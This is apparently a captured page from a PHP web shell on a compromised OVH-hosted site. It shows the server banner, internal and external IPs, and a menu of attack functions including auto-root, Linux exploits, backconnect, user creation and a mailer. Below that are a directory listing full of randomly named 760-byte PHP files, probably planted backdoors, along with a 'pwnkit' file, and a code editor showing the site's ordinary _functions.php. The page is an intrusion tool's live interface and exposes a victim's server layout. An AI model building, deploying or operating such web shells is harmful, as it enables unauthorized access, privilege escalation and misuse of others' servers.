Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
letaweb /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwx---r-x
assets
[ DIR ]
drwx---r-x
background_images
[ DIR ]
drwx---r-x
bbclone
[ DIR ]
drwx---r-x
cache
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
fonts
[ DIR ]
drwx---r-x
framework
[ DIR ]
drwx---r-x
images
[ DIR ]
drwx---r-x
install
[ DIR ]
drwx---r-x
languages
[ DIR ]
drwx---r-x
php_config
[ DIR ]
drwx---r-x
protected
[ DIR ]
drwx---r-x
requirements
[ DIR ]
drwx---r-x
sample_images
[ DIR ]
drwx---r-x
scripts
[ DIR ]
drwx---r-x
update
[ DIR ]
drwx---r-x
websites
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw----r--
_functions.php
2.71
KB
-rw----r--
admin.php
1.54
KB
-rw----r--
amadcfck.php
760
B
-rw----r--
amhywpuk.php
760
B
-rw----r--
config.php
158
B
-rw----r--
crqylmnt.php
760
B
-rw----r--
db_config.php
284
B
-rw----r--
dba_config.php
317
B
-rw----r--
elazbwnk.php
760
B
-rw----r--
feqmwfhc.php
760
B
-rw----r--
fugveiqp.php
760
B
-rw----r--
global_functions.php
266
B
-rw----r--
gmjbtxmy.php
760
B
-rw----r--
gmyosgol.php
760
B
-rw----r--
gnnxfswk.php
760
B
-rw----r--
hosting_config.php
201
B
-rw----r--
index.php
71.52
KB
-rw-r--r--
install.php
378
B
-rw----r--
ipn.php
309
B
-rw----r--
izbcvwpg.php
760
B
-rw----r--
jaklzfte.php
760
B
-rw----r--
jytvfhlh.php
760
B
-rw----r--
log_config.php
207
B
-rw----r--
mail_config.php
274
B
-rw----r--
mainsite_config.php
332
B
-rw----r--
nfunjxer.php
760
B
-rw----r--
nkfngbxn.php
760
B
-rw----r--
odylxpbr.php
760
B
-rw----r--
oeaasuek.php
760
B
-rw----r--
olkycafm.php
760
B
-rw----r--
ovmpacym.php
760
B
-rw----r--
payment_config.php
252
B
-rw----r--
pwnkit
0
B
-rwx---r-x
rnqbcnev.php
272
B
-rw----r--
rqvfyjyf.php
760
B
-rw----r--
rzhyqmcf.php
760
B
-rw----r--
sadtbusf.php
760
B
-rw----r--
session_config.php
212
B
-rw----r--
stats.php
891
B
-rw----r--
sthumb.php
59.07
KB
-rw----r--
surnaryg.php
760
B
-rw----r--
svnjmvkg.php
760
B
-rw----r--
ugbidzzi.php
760
B
-rw----r--
version.php
36
B
-rw----r--
vtkfgfmv.php
760
B
-rw----r--
wkueddbh.php
760
B
-rw----r--
xgjcsyoq.php
760
B
-rw----r--
xjhwlihv.php
760
B
-rw----r--
xkfabdun.php
760
B
-rw----r--
xphdvzfz.php
760
B
-rw----r--
zwzvzhuf.php
760
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _functions.php
<?php //define(LITE_CART_PATH, dirname(__FILE__)."/litecart"); include dirname(__FILE__)."/version.php"; error_reporting(E_ALL); ini_set("display_errors", 1); function run($name, $type = 'website', $admin = 0, $self_domain = 0, $is_main_site = 0) { // try { if ($admin==1) { $config = dirname(__FILE__).'/admin/config/admin.php'; } else if($admin==2) { $config = dirname(__FILE__).'/admin/config/stat.php'; } else if($admin==3) { $config = dirname(__FILE__).'/litecart/config/main.php'; } else { $config = dirname(__FILE__).'/admin/config/main.php'; } Yii::setPathOfAlias('application_admin', dirname(__FILE__).'/admin'); Yii::setPathOfAlias('application_root', dirname(__FILE__)); Yii::setPathofAlias('bbclone_app', dirname(__FILE__).'/bbclone'); Yii::setPathOfAlias('application_multisite', dirname(__FILE__).'/multisite'); if (!$is_main_site) { Yii::setPathOfAlias('application_parent_site', dirname(__FILE__).'/'.$type.'s'); } else { Yii::setPathOfAlias('application_parent_site', dirname(__FILE__).'/protected'); } if(!$admin) { } include dirname(__FILE__).'/admin/classes/WebApplication.php'; $application = Yii::createApplication('WebApplication', $config); $application->builderMode = $admin; $application->isMainSite = false; $application->website_type = $type; $application->website_name = $name; $application->self_domain = $self_domain; //$application->params['is_main_site'] = $is_main_site; $application->run(); //} catch (Exception $e) { //print_r($e); // echo $e->getMessage(); // } } //stripe www from domain function stripDomain($domain) { $d = $domain; if(strpos($d,"www.") === 0) { $d = substr($d,4); } return $d; } //parse domain base on mainSiteUrls function extract_domain($domain) { global $mainSiteUrls; foreach ($mainSiteUrls as $url) { $pattern = '/(?P<domain>'.stripDomain($url).')$/i'; if (preg_match($pattern, stripDomain($domain), $matches)) { return $matches['domain']; } } return $domain; } //get subdomain base on mainSiteUrls function extract_subdomains($domain) { $subdomains = $domain; $domain = extract_domain($subdomains); $subdomains = rtrim(strstr(stripDomain($subdomains), $domain, true), '.'); return $subdomains; } //check if main site is requested function isMainSite($url) { global $mainSiteUrls; for ($i = 0;$i < count($mainSiteUrls);++$i) { if (strcmp(stripDomain($mainSiteUrls[$i]), stripDomain($url)) == 0) { return true; } } return false; }
Close